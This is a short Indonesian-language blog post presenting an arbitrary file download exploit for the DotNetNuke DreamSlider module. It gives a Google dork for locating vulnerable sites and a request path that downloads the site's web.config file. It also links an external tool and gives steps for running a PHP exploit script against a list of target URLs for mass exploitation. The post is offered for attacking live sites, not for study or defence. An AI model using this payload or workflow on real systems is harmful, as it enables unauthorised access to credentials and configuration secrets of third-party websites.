Beranda » Tanpa Kategori » DotNetNuke DreamSlider Arbitrary File Download

DotNetNuke DreamSlider Arbitrary File Download

Exploit Title: dotNetNuke DreamSlider Arbitrary File Download

Google Dork: inurl://DesktopModules/DreamSlider/
Exploit: /DesktopModules/DreamSlider/DownloadProvider.aspx?File=~/web.config

Reference: https://www.exploit-db.com/exploits/43405/ (MSF)

Tools: https://pastebin.com/NYNJctB4

------------------------------------------------------------------------

1. Masukan list target ke dalam file.txt

http://target.com/

http://target2.com/

2. Jalankan php exploit.php target.txt